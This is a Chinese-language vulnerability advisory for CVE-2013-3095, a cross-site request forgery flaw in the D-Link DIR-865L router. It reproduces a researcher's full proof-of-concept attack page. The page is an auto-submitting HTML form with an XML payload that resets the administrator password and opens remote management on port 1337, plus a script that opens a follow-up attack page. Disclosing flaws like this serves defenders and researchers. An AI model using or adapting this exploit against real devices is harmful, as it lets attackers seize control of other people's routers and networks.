发布日期:2013-04-19
更新日期:2013-04-23
受影响系统:
D-Link DIR-865L
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 59312
CVE(CAN) ID: CVE-2013-3095
D-Link DIR-865L是企业级无线路由器。
D-Link DIR-865L 1.03及其他版本在验证用户请求的实现上存在安全漏洞,用户可通过这些请求执行某些操作,比如浏览特制网页时更改登录凭证,启用某些服务等。
<*来源:Jacob Holcomb
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Jacob Holcomb ()提供了如下测试方法:
In the following proof of concept attack, we assume that a device administrator with an active management session established with the router has browsed to a malicious web page. Once there, a series of automatic form submissions take place, one after the other, to the administrator's router, from the administrator's browser. Since the administrator has a current session established with the router, the form submissions are processed.
The first form (Figure 1) is pre-filled out with the information required to set the administrator password to "ISE" and enable remote management on port 1337. The second form completes the action, by instructing the D-Link to save the settings its been given.
-------------------------- Figure 1. Attack page 1. --------------------------
<html>
<head>
<title> D-LINK DIR-865L CSRF</title>
<!-- Firmware Version: 1.03 Fri 02 Nov 2012 -->
</head>
<body>
<form action="http://192.168.0.1/hedwig.cgi"
enctype="text/plain" method="post">
<input type="hidden" value="'1.0' encoding='UTF-8'?>
<postxml>
<module>
<service>DEVICE.ACCOUNT</service>
<device>
<gw_name>DIR-865L</gw_name>
<account>
<seqno>1</seqno>
<max>2</max>
<count>1</count>
<entry>
<uid>USR-</uid>
<name>Admin</name>
<usrid/>
<password>ISE</password>
<group>0</group>
<description/>
</entry>
</account>
<group>
<seqno/>
<max/>
<count>0</count>
</group>
<session>
<captcha>0</captcha>
<dummy/>
<timeout>600</timeout>
<maxsession>128</maxsession>
<maxauthorized>16</maxauthorized>
</session>
</device>
</module>
<module>
<service>HTTP.WAN-1</service>
<inf>
<web>1337</web>
<https_rport></https_rport>
<stunnel>1</stunnel>
<weballow>
<hostv4ip/>
</weballow>
<inbfilter></inbfilter>
</inf>
</module>
<module>
<service>HTTP.WAN-2</service>
<inf>
<web>1337</web>
<weballow></weballow>
</inf>
</module>
<module>
<service>INBFILTER</service>
<acl>
<inbfilter>
<seqno>1</seqno>
<max>24</max>
<count>0</count>
</inbfilter>
</acl>
<ACTIVATE>ignore</ACTIVATE>
<FATLADY>ignore</FATLADY>
<SETCFG>ignore</SETCFG>
</module>
<module>
<service>SHAREPORT</service>
<FATLADY>ignore</FATLADY>
<ACTIVATE>ignore</ACTIVATE>
</module>
</postxml>">
</form>
<script>
function CSRF1() {document.dlinkXML.submit();};window.setTimeout(CSRF1,1000)
function CSRF2() {window.open("http://192.168.0.100/dlinkCSRF2.html");};
window.setTimeout(CSRF2,1000)
</script>
</body>
</html>
-------------------------- Figure 1. Attack page 1. --------------------------